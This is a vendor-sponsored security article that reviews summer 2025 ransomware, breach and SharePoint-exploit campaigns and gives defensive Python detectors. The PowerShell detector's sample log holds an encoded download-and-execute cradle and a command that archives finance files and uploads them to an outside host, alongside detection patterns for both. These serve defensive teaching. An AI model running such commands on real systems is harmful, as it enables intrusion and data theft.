Summer 2025 was not just hot; it was relentless.
Ransomware hammered hospitals, retail giants suffered data breaches, insurance firms were hit through phishing and social engineering, and nation-state actors launched disruptive campaigns.
From a stealthy PowerShell loader to zero-day SharePoint exploits, attackers kept defenders on their heels.
This report breaks down the highest-impact events of the season and what security teams need to do before the next wave hits.
Highlight: the growing ransomware risk to healthcare this summer
Hospitals cannot afford downtime, and attackers know it.
This summer, ransomware groups targeted healthcare, exploiting both the value of patient data and the urgency of care.
Interlock emerges as a major threat to US healthcare
On July 22, 2025, a joint advisory from CISA, the FBI and HHS flagged Interlock as a major threat to the Healthcare and Public Health (HPH) sector. The group has been linked to around 14 incidents in 2025 alone, roughly a third of them affecting healthcare providers.
What sets Interlock apart is its use of "FileFix", a PowerShell launcher that hides the malicious script behind a decoy file path. It tricks users into executing the payload through File Explorer, bypassing common security detections that watch for the usual script-launch patterns.
Rhysida ransomware targets another US healthcare center
On July 8, 2025, the Rhysida ransomware group reportedly leaked sensitive data from the Florida Hand Center, including medical images, driver's licenses and insurance forms.
The clinic, which serves patients in Punta Gorda, Port Charlotte and Fort Myers, was given seven days to respond before the release.
Qilin recycles the Scattered Spider playbook in a wave of healthcare breaches
In June 2025, Qilin became the most active ransomware group, recording 81 victims, 52 of them in the healthcare sector.
The group exploited unpatched Fortinet vulnerabilities (CVE-2024-21762 and CVE-2024-55591) to gain access, deploy ransomware, and exfiltrate sensitive data such as EHRs and insurance records.
To maximize pressure, Qilin went beyond encryption, leveraging a coercive "Call a Lawyer" feature and automated negotiation tools to push victims toward a fast payment.
Test and validate your security controls against the most impactful threats of summer 2025 with the Picus Security Validation Platform, including Interlock, Qilin, DragonForce, Scattered Spider and ToolShell.
Start your 14-day free trial now and discover your readiness in minutes.
Major brands breached in a retail cybercrime wave
The retail sector could not escape the wave of cyberattacks through summer 2025.
Louis Vuitton breach is the third LVMH incident in a quarter
On July 2, 2025, Louis Vuitton UK suffered a data breach exposing customer contact information and purchase history, the third breach of an LVMH brand in three months, after Dior and Louis Vuitton Korea.
A few days later, on July 10, UK police arrested four suspects tied to the high-profile attacks on M&S, Co-op and Harrods.
The group is allegedly linked to Scattered Spider, a domestic threat known for social engineering and for collaborating with ransomware operators such as DragonForce, signaling the growing impact of homegrown cybercriminals on major retailers.
DragonForce hits US retail chain Belk
Between May 7 and 11, 2025, on the other side of the Atlantic, North Carolina-based retailer Belk suffered a data breach.
DragonForce claimed responsibility, stating that it had exfiltrated 156 GB of customer and employee data, including names, Social Security numbers, emails, order history and HR files, which were later posted on its leak site after ransom talks.
DragonForce, which first emerged in late 2023, operates as a ransomware-as-a-service cartel and had listed about 136 victims by March 2025, many of them US and UK retail outfits.
Scattered Spider's targeting shifts from retail to insurance
Scattered Spider (UNC3944), a native English-speaking cybercriminal collective, used identity-centric social engineering, voice phishing, MFA fatigue, help-desk impersonation and typosquatted domains against retailers in April and May 2025.
In mid-June 2025, researchers reported that Scattered Spider (UNC3944) had pivoted from retail to targeting US insurance firms.
- Aflac detected and contained unauthorized access on June 12, 2025; customer and employee personal data (including SSNs and health claims) may have been compromised.
- Erie Insurance and Philadelphia Insurance Companies also reported similar cyber disruptions in mid-June, resulting in operational downtime.
The intrusions match Scattered Spider's known tactical profile, although no ransomware was deployed and systems remained online.
Nation-state and geopolitical cyber activity
Not every cyber threat this summer was about money.
Nation-state hackers and hacktivists also left their mark, exploiting a turbulent geopolitical climate to launch attacks.
- June 14-17, 2025: the pro-Israel hacktivist group Predatory Sparrow hit Iran's Bank Sepah, disrupting banking services, then destroyed roughly $90 million in cryptocurrency by draining the Nobitex exchange and sending the tokens to burn addresses from which they cannot be recovered.
- June 30, 2025: the US Department of Homeland Security and CISA issued a joint warning about Iranian cyber retaliation targeting critical infrastructure in the US and Europe.
These incidents are a stark reminder that cyber conflict is now a frontline extension of geopolitical tension, one that crosses borders and regions.
Major vulnerabilities drawing public attention
Several Microsoft SharePoint vulnerabilities were exploited this summer in a widespread cyber-espionage campaign dubbed ToolShell.
- CVE-2025-53770 is a critical remote code execution flaw that lets unauthenticated attackers run arbitrary code on vulnerable on-premises SharePoint servers. Threat actors used it to deploy web shells, steal credentials and move laterally through enterprise networks. CISA added the bug to its KEV list on July 20, 2025.
- CVE-2025-49704 and CVE-2025-49706 were also added to KEV on July 22 after being abused in chained attacks. The pair enables authentication bypass and code injection, letting attackers compromise unpatched SharePoint systems, and the chain still worked against servers that had only applied the first fix.
The ToolShell campaign targeted organizations in the US, Europe and the Middle East, including government agencies, energy firms and telecom providers.
Security researchers say the attackers developed CVE-2025-53770 as a bypass of the fix Microsoft shipped on Patch Tuesday, which is why servers patched against the earlier bugs were still exposed until the follow-up update.
What to take away from the summer cyber storm
From hospitals to retail giants and insurance providers, the season exposed cracks in even the most hardened environments.
Here is what security teams should do next.
Patch like your life depends on it, because in critical sectors it does.
Start with CISA KEV entries and high-severity CVEs, but do not stop there. Ask the hard questions: are you the kind of target these attackers go after?
Validate whether each CVE is actually exploitable in your environment.
Focus on exploitation chains, not just scores; that is how adversaries work.
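The prioritisation the three points above describe can be made mechanical. The following is an added example written for this article, not Picus code: it ranks a vulnerability backlog by KEV membership, exploit-chain completeness on the same asset, exposure and validated exploitability rather than by CVSS alone. `KEV_FEED` is a constructed stub that reuses the field names of CISA's published KEV JSON (`cveID`, `vendorProject`, `product`, `dateAdded`, `knownRansomwareCampaignUse`); the SharePoint dates are those given above, while the Fortinet date, the `knownRansomwareCampaignUse` values, the CVSS scores, the asset names and the scoring weights are illustrative assumptions. The last finding uses a placeholder identifier, not a real CVE.

```python
"""Rank a vulnerability backlog by KEV membership, exploit chains and
validated exploitability, not by CVSS alone.

Added example for this article, not Picus code. KEV_FEED is a constructed
stub in the shape of CISA's KEV JSON; values, weights and asset names are
illustrative assumptions.
"""
from dataclasses import dataclass
from typing import Optional

KEV_FEED = {
    "vulnerabilities": [
        {"cveID": "CVE-2025-53770", "vendorProject": "Microsoft", "product": "SharePoint",
         "dateAdded": "2025-07-20", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2025-49704", "vendorProject": "Microsoft", "product": "SharePoint",
         "dateAdded": "2025-07-22", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2025-49706", "vendorProject": "Microsoft", "product": "SharePoint",
         "dateAdded": "2025-07-22", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2024-21762", "vendorProject": "Fortinet", "product": "FortiOS",
         "dateAdded": "2024-02-09", "knownRansomwareCampaignUse": "Known"},  # date illustrative
    ]
}

# CVEs the article describes as exploited together. A finding scores higher
# when every member of a chain is present on the same asset.
EXPLOIT_CHAINS = [frozenset({"CVE-2025-49704", "CVE-2025-49706"})]


@dataclass
class Finding:
    asset: str
    cve: str
    cvss: float
    internet_exposed: bool
    exploitable: Optional[bool]  # validation result in *your* environment; None = untested


@dataclass
class Ranked:
    finding: Finding
    score: float
    reasons: list


def kev_index(feed):
    return {v["cveID"]: v for v in feed["vulnerabilities"]}


def score_finding(f, kev, cves_on_asset):
    """CVSS as the base, then adjust for what attackers actually do."""
    s, reasons = f.cvss, []
    entry = kev.get(f.cve)
    if entry:
        s += 4
        reasons.append(f"KEV (added {entry['dateAdded']})")
        if entry.get("knownRansomwareCampaignUse") == "Known":
            s += 2
            reasons.append("known ransomware use")
    for chain in EXPLOIT_CHAINS:
        if f.cve in chain and chain <= cves_on_asset:
            s += 3
            reasons.append("complete chain: " + ", ".join(sorted(chain)))
            break
    if f.internet_exposed:
        s += 2
        reasons.append("internet exposed")
    if f.exploitable is True:
        s += 2
        reasons.append("validated exploitable here")
    elif f.exploitable is False:
        s -= 5
        reasons.append("validated not exploitable here")
    else:
        reasons.append("exploitability not yet validated")
    return round(s, 1), reasons


def prioritise(findings, feed=KEV_FEED):
    kev = kev_index(feed)
    cves_by_asset = {}
    for f in findings:
        cves_by_asset.setdefault(f.asset, set()).add(f.cve)
    ranked = [Ranked(f, *score_finding(f, kev, cves_by_asset[f.asset])) for f in findings]
    ranked.sort(key=lambda r: r.score, reverse=True)
    return ranked


# Constructed backlog: asset names and CVSS values are illustrative.
SAMPLE_FINDINGS = [
    Finding("sp-web-01", "CVE-2025-49704", 8.8, True, None),
    Finding("sp-web-01", "CVE-2025-49706", 6.5, True, None),
    Finding("sp-intranet-02", "CVE-2025-53770", 9.8, False, True),
    Finding("fw-edge-01", "CVE-2024-21762", 9.8, True, True),
    Finding("file-srv-09", "CVE-0000-0000", 9.1, False, False),  # placeholder ID, not a real CVE
]

if __name__ == "__main__":
    for r in prioritise(SAMPLE_FINDINGS):
        print(f"{r.score:5.1f}  {r.finding.asset:15} {r.finding.cve:16} {'; '.join(r.reasons)}")
```

Note how the ranking comes out: the CVSS 6.5 half of the SharePoint chain outranks the CVSS 9.1 placeholder that is neither in KEV nor exploitable where it sits, which is exactly the "chains, not scores" point.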
Harden identity as your new perimeter.
Social engineering worked better than malware this summer. Defend against MFA fatigue, strengthen help-desk verification, and limit privileged access.
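MFA fatigue leaves a distinctive trace in push-notification logs: a burst of denied or timed-out prompts for one user, sometimes followed by the approval that means the victim gave in. The following detector is an added example written for this article, not Picus code or any vendor's rule. `SAMPLE_EVENTS` is a constructed log in a simplified, vendor-neutral shape (`ts`, `user`, `result`, `src_ip`) with RFC 5737 documentation addresses; map your identity provider's real push events onto those fields before use, and treat the window and threshold as starting points to tune.

```python
"""Detect MFA-fatigue (push bombing) bursts in authentication logs.

Added example for this article, not Picus code. SAMPLE_EVENTS is a
constructed log in a simplified, vendor-neutral shape; window and threshold
are illustrative defaults.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_EVENTS = [
    # alice: five unapproved pushes in about five minutes, then an approval (victim gave in)
    {"ts": "2025-06-12T02:10:05", "user": "alice", "result": "denied",   "src_ip": "198.51.100.23"},
    {"ts": "2025-06-12T02:11:40", "user": "alice", "result": "timeout",  "src_ip": "198.51.100.23"},
    {"ts": "2025-06-12T02:12:55", "user": "alice", "result": "denied",   "src_ip": "198.51.100.23"},
    {"ts": "2025-06-12T02:14:10", "user": "alice", "result": "timeout",  "src_ip": "198.51.100.23"},
    {"ts": "2025-06-12T02:15:30", "user": "alice", "result": "denied",   "src_ip": "198.51.100.23"},
    {"ts": "2025-06-12T02:16:48", "user": "alice", "result": "approved", "src_ip": "198.51.100.23"},
    # bob: one stray denial, then a normal approval hours later (benign)
    {"ts": "2025-06-12T08:00:00", "user": "bob",   "result": "denied",   "src_ip": "203.0.113.40"},
    {"ts": "2025-06-12T09:30:00", "user": "bob",   "result": "approved", "src_ip": "203.0.113.40"},
    # carol: five timeouts in three minutes, never approved (attack that failed)
    {"ts": "2025-06-12T22:01:00", "user": "carol", "result": "timeout",  "src_ip": "198.51.100.77"},
    {"ts": "2025-06-12T22:01:45", "user": "carol", "result": "timeout",  "src_ip": "198.51.100.77"},
    {"ts": "2025-06-12T22:02:30", "user": "carol", "result": "timeout",  "src_ip": "198.51.100.77"},
    {"ts": "2025-06-12T22:03:15", "user": "carol", "result": "timeout",  "src_ip": "198.51.100.77"},
    {"ts": "2025-06-12T22:04:00", "user": "carol", "result": "timeout",  "src_ip": "198.51.100.77"},
]


def detect_mfa_fatigue(events, window_minutes=10, threshold=5):
    """Return one alert per user whose unapproved pushes reach `threshold`
    inside a sliding window of `window_minutes`. Each alert records whether an
    approval followed the burst within the same window: that is the case to
    escalate, because the account is then likely compromised, not just targeted."""
    window = timedelta(minutes=window_minutes)
    by_user = defaultdict(list)
    for e in events:
        by_user[e["user"]].append((datetime.fromisoformat(e["ts"]), e["result"], e["src_ip"]))

    alerts = []
    for user, evs in sorted(by_user.items()):
        evs.sort()
        unapproved = [ev for ev in evs if ev[1] != "approved"]
        start = 0
        for end in range(len(unapproved)):
            # shrink the window from the left until it spans at most window_minutes
            while unapproved[end][0] - unapproved[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                burst_start, burst_end = unapproved[start][0], unapproved[end][0]
                approved_after = any(
                    r == "approved" and burst_end <= t <= burst_end + window
                    for t, r, _ in evs
                )
                alerts.append({
                    "user": user,
                    "burst_start": burst_start.isoformat(),
                    "burst_end": burst_end.isoformat(),
                    "unapproved_pushes": end - start + 1,
                    "src_ips": sorted({ip for _, _, ip in unapproved[start:end + 1]}),
                    "approved_after_burst": approved_after,
                })
                break  # one alert per user is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in detect_mfa_fatigue(SAMPLE_EVENTS):
        print(alert)
```

The `approved_after_burst` flag is the field to page on: a burst that ends in an approval should trigger a session revocation and a help-desk callback to the user through a known-good channel, not just a ticket.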
Train your people, because they were the breach points.
Scattered Spider and others did not exploit a CVE; they exploited a person. Run regular simulations, update your phishing scenarios, and expose high-risk roles to the lures they actually face.
Watch what happens after initial access.
Threat actors like Interlock and Qilin did not simply drop ransomware; they moved laterally, staged data, and evaded detection. Apply behavioral monitoring to the techniques they rely on, such as PowerShell abuse, credential theft and covert exfiltration.
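One concrete piece of that behavioral monitoring is inspecting PowerShell command lines from process-creation events, including the ones hidden behind `-EncodedCommand`. The following is an added example written for this article, not Picus code or a vendor ruleset: it decodes the base64 UTF-16LE payload, then scores launcher flags, download cradles, archive staging and HTTP egress across both the command line and the decoded script. `SAMPLE_EVENTS` is a constructed log in a simplified process-creation shape (`host`, `user`, `image`, `cmdline`); the encoded payload is generated inside the block, the IPs are RFC 5737 documentation addresses, and the indicator list and alert threshold are illustrative choices.

```python
"""Flag suspicious PowerShell command lines, decoding -EncodedCommand payloads
so the indicators inside them become visible.

Added example for this article, not Picus code. SAMPLE_EVENTS is a
constructed log; the indicator list and threshold are illustrative.
"""
import base64
import re

# (regex, label) pairs: launcher flags, cradles, staging and egress
INDICATORS = [
    (r"(?i)-nop\b|-noprofile\b", "no profile"),
    (r"(?i)-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"(?i)-ep\s+bypass|-executionpolicy\s+bypass", "execution policy bypass"),
    (r"(?i)\biex\b|invoke-expression", "invoke-expression"),
    (r"(?i)downloadstring|downloadfile|net\.webclient", "download cradle"),
    (r"(?i)invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b", "http egress"),
    (r"(?i)compress-archive|io\.compression", "archive staging"),
    (r"(?i)frombase64string", "runtime decode"),
]
ENC_RE = re.compile(r"(?i)(?:-e|-ec|-enc|-encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent or invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(cmdline):
    findings = set()
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        text = cmdline
    else:
        findings.add("encoded command")
        # match indicators against the decoded script, not the base64 blob
        text = ENC_RE.sub("-enc <decoded>", cmdline) + "\n" + decoded
    for pattern, label in INDICATORS:
        if re.search(pattern, text):
            findings.add(label)
    return {"decoded": decoded, "findings": sorted(findings), "score": len(findings)}


def triage(events, threshold=2):
    """Return alerts for events whose indicator count reaches the threshold."""
    alerts = []
    for ev in events:
        result = analyse(ev["cmdline"])
        if result["score"] >= threshold:
            alerts.append({"host": ev["host"], "user": ev["user"], **result})
    return alerts


# Constructed sample log. The encoded payload is the classic download cradle.
CRADLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
ENCODED_PAYLOAD = base64.b64encode(CRADLE_SCRIPT.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"host": "WS-IT-02", "user": "helpdesk", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Service -Name Spooler"},
    {"host": "WS-FIN-07", "user": "jdoe", "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -ep bypass -enc {ENCODED_PAYLOAD}"},
    {"host": "WS-FIN-07", "user": "jdoe", "image": "powershell.exe",
     "cmdline": r'powershell.exe -c "Compress-Archive -Path C:\Finance\* -DestinationPath $env:TEMP\f.zip; '
                r'Invoke-WebRequest -Uri http://203.0.113.9/up -Method Post -InFile $env:TEMP\f.zip"'},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["host"], alert["user"], alert["score"], alert["findings"])
```

The benign administrative command scores one indicator and stays below the threshold; the encoded launcher scores six once the payload is decoded, and the staging-plus-POST command scores two, which is the "stage then exfiltrate" sequence the paragraph above describes. In production, feed this from Sysmon Event ID 1 or Windows 4688 with command-line auditing enabled, and add Script Block Logging (Event ID 4104) so obfuscation beyond base64 is also caught.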
Do not ignore legacy systems and neglected infrastructure.
The ToolShell campaign exploited unpatched on-premises SharePoint servers, many of them running unsupported or outdated versions.
Whether it is SharePoint, an internal tool, or prized legacy gear you cannot upgrade: isolate what is aging, monitor what you cannot patch, and replace what you have been ignoring.
We strongly recommend simulating real-world cyberattacks with the Picus Security Validation Platform to test the effectiveness of your security controls.
You can also test your defenses against hundreds of other malware and exploit campaigns, such as Medusa, Rhysida and Black Basta, with a 14-day free trial of the Picus platform.
Sponsored and written by Picus Security.